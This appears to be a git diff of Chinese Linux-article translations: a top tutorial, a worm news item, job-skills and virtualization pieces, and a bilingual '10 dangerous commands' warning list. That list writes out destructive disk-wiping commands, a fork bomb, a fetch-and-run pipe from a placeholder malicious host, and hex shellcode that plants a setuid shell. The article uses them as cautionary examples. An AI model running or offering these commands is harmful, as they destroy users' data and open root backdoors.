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@ -1,3 +1,3 @@

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@ -0,0 +1,97 @@
Linux命令行佷有用、很高效也很有趣但有时候也很危险尤其是在你不确定你自己在正在做什么时候。这篇文章并不打算引来你对**Linux**或**linux 命令行**的愤怒。我们只是想让你意识到在你运行某些命令时应该三思而后行。译注当然以下命令通常都是在root权限下才能将愚蠢发挥到无可救药在普通用户身份下破坏的只是自己的一亩三分地。
### 1. rm -rf 命令 ###
**rm -rf**命令是删除文件夹及其内容最快的方式之一。仅仅一丁点的敲错或无知都可能导致不可恢复的系统崩坏。下列是一些**rm 命令**的选项。
- **rm** 命令在Linux下通常用来删除文件。
- **rm -r** 命令递归的删除文件夹,甚至是空的文件夹。(译注:个人认为此处应该是说错了,从常识看,应该是“甚至是非空的文件夹”)
- **rm -f** 命令能不经过询问直接删除只读文件译注Linux下删除文件并不在乎该文件是否是只读的而只是在意其父目录是否有写权限。所以-f这个参数只是表示不必一个个删除确认而是一律悄悄删除。另外原始的rm命令其实也是没有删除提示的只是一般的发行版都会将rm通过别名的方式增加-i参数来要求删除确认而-f则抑制了这个提示。
- **rm -rf /** : 强制删除根目录下所有东东。(就是说删除完毕后,什么也没有了。。。)
- rm -rf *: 强制删除当前目录的所有文件。
- **rm -rf .** : 强制删除当前文件夹及其子文件夹。
从现在起,当你要执行**rm -rf**命令时请留心一点。我们可以在“**.bashrc**”文件对‘**rm**‘命令创建**rm -i**的别名,来预防用 **rm**‘命令删除文件时的事故,它会要求你确认每一个删除请求。(译注:大多数发行版已经这样做了,如果还没有,请这样做,并在使用-f参数前一定考虑好你在做什么译者本人有着血泪的教训啊。
### 2. :(){:|:&};: 命令###
这就是个**fork 炸弹**的实例。具体操作是通过定义一个名为 :‘的函数,它会调用自己两次,一次在前台另一次运行在后台。它会反复的执行下去直到系统崩溃。
### 3. 命令 > /dev/sda ###
### 4. mv 文件夹 /dev/null ###
这个命令会移动某个‘**文件夹**‘到**/dev/null**。在Linux中 **/dev/null** 或 **null** 设备是一个特殊的文件,所有写入它的数据都会被清除,然后返回写操作成功。(译注:这就是黑洞啊。当然,要说明的是,通过将文件夹移动到黑洞,并不能阻止数据恢复软件的救赎,所以,真正的彻底毁灭,需要采用专用的软件或者手法来完成——我知道你肯定有些东西想删除得干干净净的。)
# mv /home/user/* /dev/null
上列命令会将**User**目录所有内容移动到**/dev/null**,这意味着所有东西都被‘卷入’**黑洞 (null)**之中。
### 5. wget http://malicious_source -O- | sh ###
**注意**: 你应该时刻注意你下载包或脚本的源。只能使用那些从可信任的源中下载脚本/程序。译注所以你真的知道你在做什么吗当遇到这种需要是我的做法是先wget下来然后我去读一读其中到底写了些什么然后考虑是否执行。
### 6. mkfs.ext3 /dev/sda ###
### 7. > file###
上列命令常用来清空文件内容(译注:通常也用于记录命令输出。不过请在执行前,确认输出的文件是空的或者还不存在,否则原来的文件可真是恢复不了了——连数据恢复软件都未必能帮助你了。另外,我想你可能真正想用的是“>>”,即累加新的输出到文件,而不是刷新那个文件。)。如果用上列执行时输入错误或无知的输入类似 “> **xt.conf**” 的命令会覆盖配置文件或其他任何的系统配置文件。
### 8. \^foo\^bar ###
这个命令在我们[十个鲜为人知的 Linux 命令 - Part 3][1]中描述过,用来编辑先前运行的命令而无需重打整个命令。但当用**^foo^bar**命令时如果你没有彻底检查改变原始命令的风险,这可能导致真正的麻烦。(译注:事实上,这种小技巧是译者认为的,少数史前时代遗留下来的无用而有害的“黑客”技巧。)
### 9. dd if=/dev/random of=/dev/sda ###
### 10. 隐藏命令 ###
下面的命令其实就是上面第一个命令 (**rm -rf**)。这里的代码是隐藏在**十六进制**里的,一个无知的用户可能就会被愚弄。在终端里运行下面命令可能会擦除你的**根**分区。
char esp[] __attribute__ ((section(“.text”))) /* e.s.p
release */
= “\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68″
“cp -p /bin/sh /tmp/.beyond; chmod 4755
**注意**: 不要在你的或你的同学或学校的电脑里的**Linux**终端或Shell执行以上的任何一个命令。如果你想测试它们请在虚拟机上运行。任何不和谐或数据丢失由于运行上面的命令导致你的系统崩溃文章**作者**和**Tecmint**概不负责。(译注:译者和转载网站也不负责~
译者:[Luoxcat]( 校对:[wxy](
本文由 [LCTT]( 原创翻译,[Linux中国]( 荣誉推出

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@ -1,16 +1,17 @@
@ -30,6 +31,6 @@
译者:[Linux-pdz]( 校对:[校对者ID](校对者ID)
译者:[Linux-pdz]( 校对:[wxy](
本文由 [LCTT]( 原创翻译,[Linux中国]( 荣誉推出

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@ -1,6 +1,6 @@
@ -35,7 +35,7 @@ Ghost成功运行后终端中会有以下输出信息告诉你Ghost正运
在你的浏览器中键入 http://<YOUR_IP>:2368身份校验后你就会看到Ghost的初始页面。
在你本机的浏览器中键入 http://<YOUR_IP>:2368身份校验后你就会看到Ghost的初始页面。
@ -57,10 +57,12 @@ Ghost成功运行后终端中会有以下输出信息告诉你Ghost正运
$ sudo forever list
> info: Forever processes running
> data: uid command script forever pid logfile uptime
> data: [0] cH0O /usr/bin/nodejs index.js 15355 15357 /home/dev/.forever/cH0O.log 0:0:0:37.741
info: Forever processes running
data: uid command script forever pid logfile uptime
data: [0] cH0O /usr/bin/nodejs index.js 15355 15357 /home/dev/.forever/cH0O.log 0:0:0:37.741

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@ -1,12 +1,13 @@
新蠕虫能感染 Linux 系统和嵌入式设备!
**来自𧶼门铁克研究员的消息这个病毒通过2012年出现的 PHP 漏洞传播**
**来自赛门铁克研究员的消息这个病毒通过2012年出现的 PHP 漏洞传播**
据美国国际数据集团IDG的新闻 —— 一个新的蠕虫病毒将目标指向那些运行了 Linux 和 PHP 的 x86 架构计算机,其变种还会对运行在其他芯片架构上的设备(诸如家用路由器和机顶盒)造成威胁。
根据𧶼门铁克研究员的介绍,这种病毒利用 php-cgi 上的一个漏洞进行传播,这个 php-cgi 组件的功能是允许 PHP 代码在通用网关接口CGI的配置环境下被执行。此漏洞的代号为 CVE-2012-1823通过这个漏洞攻击者可以远程执行任意代码所以这个漏洞又叫“程任意代码执行漏洞” —— 译者注。2012年5月份PHP 5.4.3 和 PHP 5.3.13 这两个版本被打上补丁,修复了这个漏洞。
根据门铁克研究员的介绍,这种病毒利用 php-cgi 上的一个漏洞进行传播,这个 php-cgi 组件的功能是允许 PHP 代码在通用网关接口CGI的配置环境下被执行。此漏洞的代号为 CVE-2012-1823通过这个漏洞攻击者可以远程执行任意代码所以这种漏洞又叫“远程任意代码执行漏洞” —— 译者注。2012年5月份PHP 5.4.3 和 PHP 5.3.13 这两个版本已经打上补丁修复了这个漏洞。
这个𧶼门铁克的研究员在[博客][1]中写道这个名为“Linux.Darlloz”的新蠕虫病毒基于去年10月份放出的 PoC 代码PoCproof of concept概念验证。利用目标计算机的漏洞为对其进行攻击而设计的代码称为 exploit而一个没有充分利用漏洞的 exploit就是 PoC —— 译者注)。
这个门铁克的研究员在[博客][1]中写道这个名为“Linux.Darlloz”的新蠕虫病毒基于去年10月份放出的 PoC 代码PoCproof of concept概念验证。利用目标计算机的漏洞为对其进行攻击而设计的代码称为 exploit而一个没有充分利用漏洞的 exploit就是 PoC —— 译者注)。
“在传播过程中,这段蠕虫代码会随机产生 IP 地址,通过特殊途径,利用普通的用户名密码发送 HTTP POST 请求,探测漏洞”,研究员解释道:“如果一个目标没有打上 CVE-2012-1823 的补丁,这台机器就会从病毒服务器下载蠕虫病毒,之后寻找下一个目标。”
@ -26,13 +27,13 @@
“很多用户也许压根就不知道他们家里或办公室的设备存在漏洞,”啰嗦的研究员说:“我们面临的另一个问题是,即使用户注意到他们用的是有漏洞的设备,这些设备的供应商却没有提供补丁,原因是技术落后,或者完全就是硬件的限制:内存不足,或 CPU 太慢,不足以支持这些软件的新版本。”
“为了保护他们的设备免受蠕虫感染,用户需要确认这些设备是否运行在最新的固件版本上,必要的话,升级固件,设置高强度的管理员密码,在防火墙那儿,或任何独立的设备那儿,屏蔽任何对 -/cgi-bin/php, -/cgi-bin/php5, -/cgi-bin/php-cgi, -/cgi-bin/php.cgi and -/cgi-bin/php4 的 HTTP POST 请求。”没完没了的𧶼门铁克研究员说道。
“为了保护他们的设备免受蠕虫感染,用户需要确认这些设备是否运行在最新的固件版本上,必要的话,升级固件,设置高强度的管理员密码,在防火墙那儿,或任何独立的设备那儿,屏蔽任何对 -/cgi-bin/php, -/cgi-bin/php5, -/cgi-bin/php-cgi, -/cgi-bin/php.cgi and -/cgi-bin/php4 的 HTTP POST 请求。”没完没了的门铁克研究员说道。
译者:[bazz2]( 校对:[校对者ID](校对者ID)
译者:[bazz2]( 校对:[wxy](
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@ -0,0 +1,305 @@
## 1. Top 命令输出: ##
### 1.1 系统运行时间和平均负载: ###
- 当前时间
- 系统已运行的时间
- 当前登录用户的数量
- 相应最近5、10和15分钟内的平均负载。
### 1.2 任务: ###
### 1.3 CPU 状态: ###
下一行显示的是CPU状态。 这里显示了不同模式下的所占CPU时间的百分比。这些不同的CPU时间表示:
- us, user 运行(未调整优先级的) 用户进程的CPU时间
- sysystem: 运行内核进程的CPU时间
- niniced运行已调整优先级的用户进程的CPU时间
- waIO wait: 用于等待IO完成的CPU时间
- hi处理硬件中断的CPU时间
- si: 处理软件中断的CPU时间
- st这个虚拟机被hypervisor偷去的CPU时间译注如果当前处于一个hypervisor下的vm实际上hypervisor也是要消耗一部分CPU处理时间的
### 1.4 内存使用: ###
### 1.5 字段/列: ###
- D - 不可中断的睡眠态。
- R 运行态
- S 睡眠态
- T 被跟踪或已停止
- Z 僵尸态
## 2. 交互命令: ##
### 2.1 h: 帮助 ###
### 2.2 \<ENTER> 或者 \<SPACE>: 刷新显示 ###
### 2.3 A: 切换交替显示模式 ###
1. Def (默认字段组)
2. Job (任务字段组)
3. Mem (内存字段组)
4. Usr (用户字段组)
我们可以用'a'和'w'在4个 窗口间切换。'a'移到后一个窗口,'w'移到前一个窗口。用'g'命令你可以输入一个数字来选择当前窗口。
### 2.4 B: 触发粗体显示 ###
### 2.5 ds: 设置显示的刷新间隔 ###
### 2.6 ltm: 切换负载、任务、内存信息的显示 ###
### 2.7 f: 字段管理 ###
### 2.8 R: 反向排序 ###
### 2.9 c: 触发命令 ###
### 2.10 i: 空闲任务 ###
### 2.11 V: 树视图 ###
### 2.12 Z: 改变配色 ###
### 2.13 z: 切换彩色显示 ###
### 2.14 x 或者 y ###
![X 和 Y高亮](
### 2.15 u: 特定用户的进程 ###
### 2.16 n#: 任务的数量 ###
### 2.17 k: 结束任务 ###
### 2.18 r: 重新设置优先级 ###
## 3. 命令行选项: ##
### 3.1 -b: 批处理模式 ###
### 3.2 -c: 命令/程序名 触发: ###
### 3.3 -d: 设置延迟间隔 ###
$ top -d 1
### 3.4 -i: 切换显示空闲进程 ###
### 3.5 -n: 设置迭代数量 ###
$ top -n 3
### 3.6 -p: 监控特定的PID ###
### 3.7 -u 或 -U: 用户名 或者 UID ###
$ top -p 28453 -u raghu
top: conflicting process selections (U/p/u)
译者:[geekpi]( 校对:[wxy](
本文由 [LCTT]( 原创翻译,[Linux中国]( 荣誉推出

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@ -1,62 +0,0 @@
icybreaker translating
Insights into top 3 IT skill groups in highest demand
According to our [IT skill sets][1] research, IT skills required by employers of Linux talent can be classified into relatively independent groups. This article focuses on the top three groups of IT skills that were in the highest demand in the last quarter (Jul-Sep 2013) and refer to job advertisements in selected countries, including USA. It turns out that these three groups of IT skills can be linked with Linux related job categories.
It seems that in the last quarter Embedded Devices Developers related skills were in the highest demand by employers of Linux professionals. The second and third skill groups refer to Virtualization Engineering and LAMP Administrator job opportunities, respectively. This article discusses skill requirements for these three types of job listings and provides insights into the dependency structure of pairs of IT skills within the analyzed three groups of skills.
> If you have not read our [IT Skill Sets][1] article it is recommended to familiarize yourself with this article before you start reading the content below. This article is based on the material presented previously in [IT Skill Sets][1], which explains in detail the methodology used in this study.
### October 2013 update to IT skills classification ###
In the IT skill sets article, analyzed the Linux job listings for the period between May and the end of June 2013. We have brought this classification up to date by considering the period of July until the end of September 2013. The percentage of Linux job ads corresponding to ten relatively independent groups of IT skills is displayed in the above bar chart[1]. The following link to the [IT Classification][2] diagram shows how this bar chart was devised based on the classifications. The top three IT skill groups in highest demand are: Embedded Devices Developers with 27% of Linux job market share; Virtualization Engineers with 20% of Linux job market share; and LAMP Administrators with 12% of Linux job market share. In the next three sections of this article we will focus on the identified top 3 IT skill groups and discuss in detail relationships between pairs of skills. For instance, MySQL and PHP are strongly linked and usually required in tandem by employers. Note also that knowledge of Linux is required in every job advertisement taken into account in the study conducted by
### Embedded Devices Developers and Programmers ###
The first set of skills in the highest demand are skills relevant to Embedded Devices Developers and Programmers. Dependency chart[2] below shows more detail pertaining to relationships between pairs of skills. Specifically, it shows which pairs of skills are most likely to appear together in Linux related job advertisements. For instance, Embedded links strongly to C/C++/C#, which is visualized in the graph by either darker shade of a rectangle in the lower part of the graph or larger portion of the corresponding circles shaded in the upper portion of the graph.
In general, this group of skills can be further split into three segments. These are:
1. **Android, Embedded, C/C++/C# and Java**. This is the core of the skills you need to know if you would like to work in development of embedded devices. It is possible that either C/C++/C# or Java is required by employers, since Java is based to some extend on C/C++/C#. If you have a look at the Octobers IT Skills Watch, Java leads as a programming language with the score of 9513 compared with the C/C++/C# score of 5403. Therefore, in general, if you stand before a choice between mastering of C/C++/C# or Java, Java seems to be a better choice. However, according to the graph below, C/C++/C# seems to appear more frequently in the advertisements relevant to Embedded devices. This suggests that, even though Java gets a higher general score in IT Skills Watch, mastering of C/C++/C# rather than Java is required for Embedded Devices Developer positions.
1.** Python, Perl and Bash**. These set of skills are a complementary set of programming and scripting skills. Perl and Python seem to appear often together in job advertisements, however, it is reasonable to assume that these two skills are required alternatively.
1. **Git, Subversion and Jira**. These skills pertain to source code management, debugging and project management. Some knowledge of these skills is certainly an advantage to programming related projects. Currently, the majority of open source development projects and a large number of corporate projects use such software to manage their source code.
### Virtualization Engineers including skills related to data storage and management ###
The second group of skills that are currently in demand are the group of skills relating to job advertisements relevant to Virtualization Engineering job opportunities as illustrated in the dependency chart[2] below. This group can be further divided into two segments. The first segment of skills is Redhat, VMware, vSphere, ESX/ESXi, XenServer and Citrix. These skills are paramount for Virtualization Engineering job opportunities. The second segment of skills are skills relevant to Unix Systems, Data Storage and Management. It appears that these two segments are closely related. It is not a surprise that VMware comes together with ESX/ESXi and vSphere since ESX/ESXi is a computer virtualization product offered by VMware and vSphere is VMwares cloud computing virtualization operating system. It is also interesting that Redhat has been grouped with VMware and Citrix products. The strong relation of Solaris and AIX could be a consequence of the fact that they are both proprietary Unix Systems and possibly knowledge of either one of them is sufficient.
### LAMP Administrators ###
Finally, the third group of skills is the type of skills required by employers of LAMP administrators exhibited in the dependency chart[2] below. LAMP stands for Linux Apache MySQL and PHP. All these skills are a core for a LAMP administrator. This is a relatively small group of skills that can take you far in your Linux career. In particular, the strong relation of PHP and MySQL suggests that one of these skills cannot come without the other.
### Conclusion ###
In terms of employability and groups of skills relevant to Linux professionals, this article has identified two important points. The first point shows ten groups of IT skills that were identified by clustering analysis of the most frequently appearing IT skills. The second point of this article shows that the highest demand exists for Embedded Devices and Programmers positions as indicated in the Percentage of Linux job ads linked with corresponding skill groups bar chart. This is followed by job advertisements relevant to Virtualisation Engineering positions and LAMP administrator positions. These three skill groups are core Linux related professions in the last quarter analyzed.
### References ###
[1] Percentage of Linux job ads linked with corresponding skill groups created by [GNU R][3]. Relevant package: graphics.
[2] Dependency charts created by [GNU R][3]. Relevant package: corrgram.
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本文由 [LCTT]( 原创翻译,[Linux中国]( 荣誉推出

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@ -0,0 +1,77 @@
Intel Haswell Linux Virtualization: KVM vs. Xen vs. VirtualBox
The latest chapter to our lengthy [Intel Haswell][1] on [Linux saga][2] is virtualization benchmarks. From Fedora 19 with the very latest software components for Linux virtualization, the performance of KVM, Xen, and VirtualBox were benchmarked from the Intel Core i7 4770K "Haswell" CPU.
Since last month's Haswell launch we have published many benchmarks of the new Intel CPUs but not being covered at Phoronix until today is the Linux virtualization performance for Haswell. With Intel hardware virtualization enabled, KVM, Xen, and VirtualBox were compared from a clean Fedora 19 64-bit installation.
Fedora 19 presently has the Linux 3.9.8 kernel with GCC 4.8.1, Mesa 9.2.0-devel, and an EXT4 file-system. All of the virtualization components were obtained from the Fedora 19 repository, including QEMU 1.4.2, Xen 4.2.2, and the libvirt / virt-manager components. Xen and KVM virtualization were setup through virt-manager. VirtualBox 4.2.16 was obtained from and installed on Fedora 19.
The Intel Core i7 4770K system had 16GB of RAM and a 240GB OCZ Vertex 3 SSD. During testing, each VM had access to all eight logical cores (four physical cores + Hyper Threading), access to 12GB of the system's 16GB of RAM, and a 16GB virtual disk.
The KVM, Xen, and VirtualBox performance from Fedora 19 Linux 3.9 with the Intel Core i7 "Haswell" processor were also compared to the "bare metal" results when the benchmarks were running on the host without any form of virtualization or other means of abstraction. VMware's products weren't benchmarked in this article since their EULA restricts public benchmarking (though VMware has been okay with us running such benchmarks in the past) and their trial software being limited to running on four CPU cores, but a separate article will look at the Xen/KVM/VMware performance on other hardware in the future.
All of this Linux virtualization benchmarking was handled in a fully automated and reproducible manner using the open-source [Phoronix Test Suite][3] software and hosting by [][4]. With using a virtual disk and with Xen/KVM not having a reliable means of shared 3D access to the host's driver/GPU, most of the benchmarks within this article are computational focused to look at the performance overhead for the different Linux virtualization methods.
Disk benchmarking wasn't a main focus of this virtualization testing since only a virtual disk was being used on the host's file-system. However, when comparing these three Linux virtualization methods against the bare metal results, KVM on the Linux 3.9 kernel was performing the best followed by Xen. Oracle's VirtualBox was running just 66% the speed of the host's PostMark mail server performance while KVM was at 96% the performance and Xen at 83% the host's speed.
For the Dolfyn Computational Fluid Dynamics workload, there arent any major changes in performance against the bare metal results when running on KVM or Xen. However, VirtualBox is noticeably slower.
The FFTE and HMMer results were similar to Dolfyn where Xen and KVM were leading to great performance results with very little overhead, but Oracle VM VirtualBox was much slower.
John The Ripper was crashing when being run under VirtualBox.
Xen virtualization on the Linux 3.9 kernel with Fedora 19 strikes its first performance win when running the TTSIOD renderer.
Overall, Xen and KVM virtualization worked out great on Fedora 19 in conjunction with the Intel Core i7 4770K CPU. The performance overhead of these virtualization methods were minimal on the Haswell processor. While Xen and KVM were running great on the new Intel CPU, Oracle's VirtualBox (the latest release, v4.2.16) was much slower than Xen and KVM. The benefit VirtualBox has though is means of guest 3D acceleration, which will be benchmarked again in a future Phoronix article. Also to be benchmarked soon on Phoronix will be the relative overhead of the different virtualization methods when comparing Haswell to previous generations of Intel processors as well as AMD's competition.
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@ -1,166 +0,0 @@
10 Most Dangerous Commands You Should Never Execute on Linux
"10个最危险的命令 你永远不要在Linux下执行否则呵呵.."
Linux command line is productive, useful and interesting but sometimes it may be very much dangerous specially when you are not sure what you are doing. This article is not intended to make you furious of **Linux** or **Linux command** line. We just want to make you aware of some of the commands which you should think twice before you execute them.
"Linux命令行佷有用很高效也很有趣但有时候你不确定你自己在正在做什么时尤其的危险。这篇文章并不打算使你对**Linux**或**linux 命令行**感到愤怒。我们只是想让你意识到在你运行有些命令时应该三思而后行。"
### 1. rm -rf Command ###
"### 1. rm -rf 命令 ###"
The **rm -rf** command is one of the fastest way to delete a folder and its contents. But a little typo or ignorance may result into unrecoverable system damage. The some of options used with **rm command** are.
"**rm -rf**命令是删除文件夹及其内容最快的方式之一。仅仅一丁点的打字错误或无知都可能导致不可恢复的系统毁坏。下列是一些**rm 命令**的选项。"
- **rm** command in Linux is used to delete files.
"- **rm** 命令在Linux下通常用来删除文件。"
- **rm -r** command deletes the folder recursively, even the empty folder.
"- **rm -r** 命令递归的删除文件夹,甚至是空的文件夹。"
- **rm -f** command removes Read only File without asking.
"- **rm -f** 命令能不经过询问直接删除‘只读文件’。"
- **rm -rf /** : Force deletion of everything in root directory.
"- **rm -rf /** : 强制删除root目录下所有东东。"
- **rm -rf ** * : Force deletion of everything in current directory/working directory.
"- **rm -rf** * : 强制删除当前目录/工作目录的所有文件。"
- **rm -rf .** : Force deletion of current folder and sub folders.
"- **rm -rf .** : 强制删除当前文件夹及其子文件夹。"
Hence, be careful when you are executing **rm -rf** command. To overcome accidental delete of file by **rm** command, create an alias of **rm** command as **rm -i** in “**.bashrc**” file, it will ask you to confirm every deletion.
"从现在起,当你要执行**rm -rf**命令时请留心一点。我们可以在“**.bashrc**”文件对‘**rm**‘命令创建**rm -i**的别名,来预防用 **rm**‘命令删除文件时的事故,它会要求你确认每一个删除请求。"
### 2. :(){:|:&};: Command ###
"### 2. :(){:|:&};: 命令###"
The above is actually a **fork bomb**. It operates by defining a function called :, which calls itself twice, once in the foreground and once in the background. It keeps on executing again and again till the system freezes.
"这就是个**fork 炸弹**的实例。具体操作是通过定义一个名为 :‘的函数,它会调用自己两次,一次在前台另一次运行在后台。它会反复的执行下去直到系统崩溃。"
" :(){:|:&};:"
### 3. command > /dev/sda ###
"### 3. 命令 > /dev/sda ###"
The above command writes the output of **command** on the block **/dev/sda**. The above command writes raw data and all the files on the block will be replaced with raw data, thus resulting in total loss of data on the block.
### 4. mv folder /dev/null ###
"### 4. mv 文件夹 /dev/null ###"
The above command will move **folder** to **/dev/null**. In Linux **/dev/null** or **null** device is a special file that discards all the data written to it and reports that write operation succeed.
"上列命令会移动‘**文件夹**‘到**/dev/null**。在Linux中 **/dev/null** 或 **null** 设备是一个特殊的文件,所有写入它的数据都会被清除,然后返回写操作成功。"
" # mv /home/user/* /dev/null"
The above command will move all the contents of a **User** directory to **/dev/null**, which literally means everything there was sent to **blackhole (null)**.
"上列命令会将**User**目录所有内容移动到**/dev/null**,这意味着所有东西都被‘卷入’**黑洞 (null)**之中。"
### 5. wget http://malicious_source -O- | sh ###
"### 5. wget http://malicious_source -O- | sh ###"
The above command will download a script from a malicious source and then execute it. Wget command will download the script and **sh** will execute the downloaded script.
**Note**: You should be very much aware of the source from where you are downloading packages and scripts. Only use those scripts/applications which is downloaded from a trusted source.
"**注意**: 你应该时刻注意你下载包或脚本的源。只能使用那些从可信任的源中下载脚本/程序。"
### 6. mkfs.ext3 /dev/sda ###
"### 6. mkfs.ext3 /dev/sda ###"
The above command will format the block **sda** and you would surely be knowing that after execution of the above command your Block (**Hard Disk Drive**) would be new, **BRAND NEW!** Without any data, leaving your system into unrecoverable stage.
### 7. > file ###
"### 7. > file###"
The above command is used to flush the content of file. If the above command is executed with a typo or ignorance like “> **xt.conf**” will write the configuration file or any other system or configuration file.
"上列命令常用来清空文件内容。如果用上列执行时输入错误或无知的输入类似 “> **xt.conf**” 的命令会覆盖配置文件或其他任何的系统配置文件。"
### 8. ^foo^bar ###
"### 8. ^foo^bar ###"
This command, as described in our [10 Lesser Known Linux Commands][1], is used to edit the previous run command without the need of retyping the whole command again. But this can really be troublesome if you didnt took the risk of thoroughly checking the change in original command using **^foo^bar** command.
### 9. dd if=/dev/random of=/dev/sda ###
"### 9. dd if=/dev/random of=/dev/sda ###"
The above command will wipe out the block **sda** and write random junk data to the block. Of-course! Your system would be left at inconsistent and unrecoverable stage.
### 10. Hidden the Command ###
"### 10. 隐藏命令 ###"
The below command is nothing but the first command above (**rm -rf**). Here the codes are hidden in **hex** so that an ignorant user may be fooled. Running the below code in your terminal will wipe your **root** partition.
"下面的命令其实就是上面第一个命令 (**rm -rf**)。这里的代码是隐藏在**十六进制**里的,一个无知的用户可能就会被愚弄。在终端里运行下面命令可能会擦除你对**root**分区。"
This command here shows that the threat may be hidden and not normally detectable sometimes. You must be aware of what you are doing and what would be the result. Dont compile/run codes from an unknown source.
" char esp[] __attribute__ ((section(“.text”))) /* e.s.p"
" release */"
" = “\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68″"
" “\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99″"
" “\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7″"
" “\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56″"
" “\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31″"
" “\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69″"
" “\x6e\x2f\x73\x68\x00\x2d\x63\x00″"
" “cp -p /bin/sh /tmp/.beyond; chmod 4755"
" /tmp/.beyond;”;"
**Note**: Dont execute any of the above command in your **Linux** terminal or shell or of your friend or school computer. If you want to test them, run them in virtual machine. Any in-consistence or data loss, due to the execution of above command will break your system down for which, neither the **Author** of the article nor **Tecmint** is responsible.
"**注意**: 不要在你的或你的同学或学校的电脑里的**Linux**终端或Shell执行以上的任何一个命令。如果你想测试它们请在虚拟机上运行。任何不和谐或数据丢失由于运行上面的命令导致你的系统崩溃文章**作者**和**Tecmint**概不负责。"
Thats all for now. I will soon be here again with another interesting article you people will love to read. Till then Stay tuned and connected to **Tecmint**. If you know any other such **Dangerous Linux Commands** and you would like us to add to the list, please tell us via comment section and dont forgot to give your value-able feedback.
译者:[Luoxcat]( 校对:[校对者ID](校对者ID)
本文由 [LCTT]( 原创翻译,[Linux中国]( 荣誉推出

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@ -0,0 +1,51 @@
> 如果您尚未阅读[IT技能清单][1],我们强烈建议您在阅读以下内容前先熟悉这篇文章。它详细阐明了本次研究中用到的方法,本文也是基于[IT技能清单][1]的材料才得以进一步分析。
### 2013年8月IT技能分类更新 ###
### 嵌入式开发人员及程序员 ###
1. **Android, Embedded, C/C++/C# and Java**.如果您准备在嵌入式领域发展这些是你需要掌握的核心技能而C/C++/C#或Java掌握其一便可满足雇主需求因为Java是基于部分C/C++/C#性能的扩展性语言。如果您阅读了8月的IT技能表就会发现Java以9513分居于编程语言的榜首而C/C++/C#是5403分。如果您尚在犹豫是掌握C/C++/C#还是Java从技能表得分看起来Java应该是更好的选择。但根据如下图表显示C/C++/C#似乎在嵌入式领域的招聘需求中更受欢迎。总结可得尽管Java在IT技能表中有更高的得分但在嵌入式开发职位上掌握C/C++/C#会比Java更有用。
1.** Python, Perl and Bash**.这些是对脚本编程语言技能的补充。对Perl和Python语言的需求经常会在招聘中同时出现当然也可以理解成这两种语言技能都是需要掌握的。
2. **Git, Subversion and Jira**.这些软件知识会应用到源码管理、调试和项目管理中,同时了解这几个方面的知识对相关项目的编程大有裨益。目前,主流开源项目和大量合作项目都在用类似的软件管理他们的源码。
### 涉及数据仓储及管理的虚拟化技术工程师 ###
目前第二大需求技能组是如下[依赖图][2]所示与虚拟化技术工程师相关的技能。这一组可进一步细分成两部分第一部分是Redhat, VMware, vSphere, ESX/ESXi, XenServer and Citrix这些技能对寻求虚拟化技术工程师的工作很重要第二部分是同Unix系统、数据仓储及管理相关的技能。同时这两部分是紧密联系的。显然VMware和ESX/ESXi及vSphere是相关的因为ESX/ESXi是VMware虚拟机下提供的虚拟产品而vSphere是VMware虚拟机的云端虚拟操作系统。Redhat和VMware、Citrix产品被分到同一部分同样有其原因。这里Solaris和AIX具有密切关系的原因可以理解为它们都是专有的Unix系统掌握其一便可。
### LAMP管理员 ###
### 总结 ###
### 参考 ###
[1] Percentage of Linux job ads linked with corresponding skill groups created by [GNU R][3]. Relevant package: graphics.
[2] Dependency charts created by [GNU R][3]. Relevant package: corrgram.
译者:[icybreaker]( 校对:[校对者ID](校对者ID)
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@ -1,290 +0,0 @@
难以置信! 30个top命令示例以及截图
### 1. Top 命令输出: ###
![Top default display](
First few lines are horizontal showing summary about different system 前几行水平显示了不同系统参数的概括,接下来是进程和它们在列中的属性。
#### 1.1 系统运行时间和平均负载: ####
![Uptime display](
- 当前时间
- 系统运行的时间
- 登陆用户的数量
- 相应最近5、10和15分钟内的平均负载。
#### 1.2 任务: ####
![Task summary](
#### 1.3 CPU 状态: ####
![CPU status display](
下一行显示的是CPU状态。 这里显示了不同模式下的CPU时间 %age。这些不同的CPU时间表示:
- us, user 运行(未调整优先级的) 用户进程的CPU时间
- sysystem: 运行内核进程的CPU时间
- niniced运行已调整优先级的用户进程的CPU时间
- waIO wait: 用于等会IO完成的CPU时间
- hi处理硬件中断的CPU时间
- si: 处理软件中断的CPU时间
- st被hypervisor偷去用于vm的CPU时间。
#### 1.4 内存使用: ####
![Memory usage](
#### 1.5 字段/列: ####
![Top columns](
- D - 不可中断的睡眠态。
- R 运行态
- S 睡眠态
- T 被追踪或已停止
- Z 僵尸态
### 2. 交互命令: ###
#### 2.1 h: 帮助 ####
![Help options](
#### 2.2 <ENTER> 或者 <SPACE>: 刷新显示 ####
#### 2.3 A: 触发交替显示模式 ####
1. Def
2. Job
3. Mem
4. Usr
![Alternative display mode](
我们可以用'a'和'w'在4个 窗口间切换。'a'移到后一个窗口,'w'移到前一个窗口。用'g'命令你可以输入一个数字来选择当前窗口。
![Window selection in alternative display](
#### 2.4 B: 触发粗体显示 ####
Some important information is shown in bold characters. This command toggles use of bold.
![Bold off](
#### 2.5 d or s: 设置显示的时间间隔 ####
当按下'd'或's'时你将被提示输入一个值以秒为单位它会以设置的值作为显示间隔。如果你这里输入了1, top将会每秒刷新。
![Display time interval](
#### 2.6 ltm: 触发负载、任务、内存信息 ####
![Load average off](
![CPU summary off](
![Memory and swap usage off](
![All three displays off](
#### 2.7 f: 字段管理 ####
![Managing columns](
< and >
#### 2.8 R: 反向排序 ####
#### 2.9 c: 触发命令 ####
![Full command path](
#### 2.10 i: Idle Tasks ####
![Idle task display off](
#### 2.11 V: 树试图 ####
![Forest view of tasks](
#### 2.12 Z: 改变颜色映射 ####
![Customizing colors](
![Colored display](
#### 2.13 z: 触发彩色 ####
#### 2.14 x 或者 y ####
![X and Y highlighted](
#### 2.15 u: 用户的进程 ####
![Processes of 'raghu' user](
#### 2.16 n or #: 任务的数量 ####
![Setting number of tasks displayed](
#### 2.17 k: 结束任务 ####
![Killing a task](
#### 2.18 r: 重新调整优先级 ####
